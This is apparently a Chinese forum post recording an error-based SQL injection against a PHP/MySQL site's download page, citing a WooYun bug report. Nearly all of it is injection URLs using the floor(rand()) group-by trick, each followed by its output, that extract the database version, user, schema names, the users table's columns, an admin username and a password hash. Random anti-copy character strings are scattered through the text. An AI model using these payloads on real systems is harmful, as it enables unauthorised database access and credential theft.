php+mysql高级爆错注入经测算有效

admin

http://www.wooyun.org/bugs/wooyun-2010-01666
( t  i$ R1 D- @" D3 K7 b  v, L8 C8 q& w& O
! Q9 p9 G* N9 m3 _. U之前想找个测试 没想到这有 可以测试下做个记录而已
' _% e  h8 x! L. h" q
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
) L% r8 M$ A  L4 Q
/data0/htdocs/leqi_new/app/myapp.php

7 }  g. R3 K, F3 c6 ^ 或者
0 ]& s2 G3 `! [9 X
9 _% O* D  z. }6 M7 I: N/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 U  |* M& ?4 R/ U
/**********user()**********/  
9 C2 J' Y- t6 l6 P) d7 Uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 j4 }5 W  _' y+ l
9 l( i" Z) u5 v+ o* R/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 |: |! E! j' D/ F" ]7 e* f' cinformation_schema
9 h0 Q% d5 J* G  P; p8 \http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: N0 D/ Z# Z( e# aleqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
6 u6 W1 u. ~/ g0 E9 `7 _) ]. Y  E& Etest
1 ]4 l2 b) }$ H" Q: n$ ^  [& B
/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: n( {# b; Z  ]  p' B# X4 Z( X, Quser_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
+ Q$ ?! |" B" U/ M: h0 B11 21
$ l) g# [6 \. f, r' y+ x$ Mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361
/ g" O7 h# y1 {6 |/**********爆数据**********/
- H5 E, l$ Q( p+ {& x/ @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
) g4 L2 {5 G7 f' M1 \6a8b4574ca231eb8bd52764d4978ffcd


5 g; c1 G$ e2 g0 x" h